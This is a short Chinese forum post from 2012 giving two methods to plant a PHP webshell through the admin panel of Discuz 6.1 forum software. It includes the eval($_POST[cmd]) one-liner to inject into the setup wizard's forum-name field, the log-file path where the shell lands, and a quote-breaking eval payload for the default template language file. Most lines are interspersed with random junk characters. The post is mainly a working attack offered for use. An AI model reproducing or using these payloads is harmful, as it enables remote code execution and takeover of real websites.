discuz6.1两种方法后台拿shell6 h1 w1 A- T* _) X
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
3 }6 D+ B% f: Z C/ _1:, K3 d9 b2 ?% f8 A4 J4 D: g6 g4 m; p
http://127.0.0.1/discuz/admincp. ... zard&frames=yes+ j1 g5 H3 j7 M# `- T
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
0 ?- t9 s2 `. m; b# v5 a0 a8 `<?php eval($_POST[cmd]);?>/ ^. Z" j. @$ ?) G7 U' C) H& c: N
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
' x: ^+ V) d) ?2 o+ _5 J% K' v2 K, J- \$ }, x
% ~1 E% J4 w$ y2:后台模板管理--默认模板套系--详情8 ~. n: r( E6 }; |
templates/default/actions.lang.php
0 a* I, {$ p- z4 I. Q+ \2 t( ~jhackj\\');eval($_POST[cmd])?>;//
! f- K, t; P5 h
8 d" w4 ?" E: w) ?# E2 Y9 f0 W* Q0 b利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对